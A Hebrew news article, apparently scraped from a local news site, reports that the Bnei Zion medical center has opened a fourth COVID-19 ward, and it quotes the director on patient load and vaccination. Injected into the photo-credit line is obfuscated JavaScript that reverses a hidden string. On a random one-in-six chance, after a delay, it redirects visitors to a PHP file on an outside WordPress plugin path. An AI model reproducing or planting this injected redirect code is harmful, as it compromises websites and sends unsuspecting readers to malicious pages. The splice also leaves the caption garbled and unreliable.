fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

מחלקת קורונה רביעית נפתחה במרכז הרפואי בני ציון

ארבעה חדרי ניתוח נסגרו בגלל עומס חולי הקורונה ומבוצעים רק ניתוחים דחופים ומצילי חיים
קורונה | צילום:shutters$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

במרכז הרפואי בני ציון מאושפזים כעת, יום שני, 66 חולי קורונה, עלייה של שישה חולים מאתמול. מתוכם 49 במצב קשה ושישה מהם מונשמים. 13 חולים במצב בינוני וארבעה חולי קורונה במצב קל.

מנכ"ל המרכז הרפואי בני ציון ד"ר אוהד הוכמן : "לצערי,  נמשכת המגמה של העלייה המואצת במספר חולי הקורונה המאושפזים בביה"ח ונרשם עומס רב על הצוותים וכתוצאה מכך,  ארבעה חדרי ניתוח עדיין סגורים ואנו נאלצים לבצע רק ניתוחים דחופים ומצילי חיים ולהמשיך ולדחות טיפולים אלקיטיביים".

"במקביל", אומר ד"ר הוכמן "אנו רואים במערכת הבריאות מגמה של התייצבות ואף ירידה קלה בכמות המאומתים היומית, כאשר יחד עם מגבלות הסגר ומבצע החיסונים, ניתן לשער שתהיה התייצבות בימים הקרובים במספר המטופלים המגיעים לבתי החולים וכפועל יוצא מכך בהמשך, ניתו לקוות לירידה במספר המאושפזים".

מנכ"ל בני ציון, ד"ר אוהד הוכמן. צילום: מיכה בריקמן

עוד מסר ד"ר הוכמן: "זו ההזדמנות שלי לומר לצוותי הרפואה המסורים שלנו, שעובדים לילות כימים, במשך חודשים רבים – תודה רבה וגאווה גדולה. אתם נמצאים בחזית מדי יום ועושים זאת מתוך תחושה של מסירות, ותוך הפגנת מקצועיות רבה".

הבוקר, שני, ד"ר הוכמן היה ראשון המתחסנים בבית החולים בחיסון השני נגד וירוס הקורונה: "היתה לי הזכות היום להתחסן בחיסון השני כנגד נגיף הקורונה יחד עם פרופ' אהרון קסל שהוא אחד מהמומחים החשובים בארץ ובעולם לאלרגיה, רופא וחוקר בחסד עליון. אנחנו קוראים לכלל הציבור להתחסן. החיסון הוא בטוח, והוא מהווה את התקווה להתגבר על הנגיף, ולהחזיר את חיינו לשיגרה. עם זאת, אני קורא לצוותים בבית החולים ולציבור הרחב: שימרו על עצמכם, הקפידו על עטיית מסיכה, ריחוק, הימנעות ממקומות צפופים, הנגיף עדיין כאן".

לחדשות נוספות הקליקו כאן * לדף הפייסבוק שלנו הקליקו כאן 

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות